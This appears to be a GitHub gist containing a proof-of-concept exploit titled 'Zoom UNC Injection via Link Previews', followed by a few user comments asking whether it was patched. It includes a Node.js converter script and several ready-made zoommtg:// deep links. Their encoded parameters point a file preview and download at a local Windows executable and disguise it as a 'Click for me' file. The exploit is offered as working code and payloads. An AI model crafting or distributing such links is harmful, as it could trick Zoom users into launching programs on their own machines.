Zoom UNC Injection via Link Previews
// Usage to build a custom url | |
// sabri@localhost Desktop % node converter.js "cmd=sic&type=none&uss=355fed60.8b5mS4m5-EvxX4mpOGePJnqP7eHtppIFCmhYCQWWa8Da49yd91RbLyWP6RwF31vD&cnonce=3YHffyG67M1KfWNLg-JiWofUJJRpcAmCck9W3n0-MKA-&app=chrome&from=meeting&previewUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&downloadUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&fileName=Click%20for%20me%20%40pwnsdx&fileSize=240&fileId=&thumbnailUrl=https%3A%2F%2Fwww.getdigital.eu%2Fweb%2Fgetdigital%2Fgfx%2Fproducts%2F__generated__resized%2F380x380%2FAufkleber_Trollface.jpg" | |
// Your URL is zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3IlMjBtZSUyMCU0MHB3bnNkeCZmaWxlU2l6ZT0yNDAmZmlsZUlkPSZ0aHVtYm5haWxVcmw9aHR0cHMlM0ElMkYlMkZ3d3cuZ2V0ZGlnaXRhbC5ldSUyRndlYiUyRmdldGRpZ2l0YWwlMkZnZnglMkZwcm9kdWN0cyUyRl9fZ2VuZXJhdGVkX19yZXNpemVkJTJGMzgweDM4MCUyRkF1ZmtsZWJlcl9Ucm9sbGZhY2UuanBn&t=1585795509792 | |
const url = require('url'); | |
const confid = process.argv[2]; | |
const zoomUrl = `zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=${Buffer.from(confid).toString('base64')}&t=1585795509792`; | |
console.log(`Your URL is ${zoomUrl}`); |
zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPWRyb3Bib3gmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3IlMjBtZSUyMCU0MHB3bnNkeCZmaWxlU2l6ZT0yNDAmZmlsZUlkPSZ0aHVtYm5haWxVcmw9&t=1585795509792 |
zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3IlMjBtZSUyMCU0MHB3bnNkeCZmaWxlU2l6ZT0yNDAmZmlsZUlkPSZ0aHVtYm5haWxVcmw9aHR0cHMlM0ElMkYlMkZ3d3cuZ2V0ZGlnaXRhbC5ldSUyRndlYiUyRmdldGRpZ2l0YWwlMkZnZnglMkZwcm9kdWN0cyUyRl9fZ2VuZXJhdGVkX19yZXNpemVkJTJGMzgweDM4MCUyRkF1ZmtsZWJlcl9Ucm9sbGZhY2UuanBn&t=1585795509792 |
This comment has been minimized.
This comment has been minimized.
It wasn't when they released the first fixes but I'd say probably. Not going to reinstall this thing to check again, even in a VM. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Was this patched?